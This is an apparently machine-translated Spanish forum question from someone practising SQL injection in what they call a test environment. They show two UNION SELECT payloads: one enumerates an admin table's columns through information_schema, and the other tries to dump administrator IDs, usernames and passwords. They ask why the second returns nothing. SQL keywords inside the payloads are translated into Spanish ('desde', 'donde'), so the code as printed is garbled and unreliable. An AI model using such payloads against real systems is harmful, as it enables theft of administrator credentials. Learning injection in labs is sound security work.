Estoy practicando inyección SQL. He podido obtener los nombres de columna y de tabla en un entorno de prueba.
consulta 1. Al ejecutar la siguiente consulta, veo adminId, adminUsername, adminPassword
enlace union select 1,2, group_concat (column_name), 4,5,6, 7 desde information_schema.columns donde table_name = admin; -
consulta 2. Ahora, al crear la consulta como se muestra a continuación, no veo nada.
enlace union select 1,2, group_concat (adminId, 0x3a, adminUsername, 0x3a, adminPassword ), 4,5,6,7 de admin; -
Estoy confundido acerca de por qué no muestra el nombre de usuario, los campos de la columna de contraseña con query2, cuando query1 muestra resultados con éxito.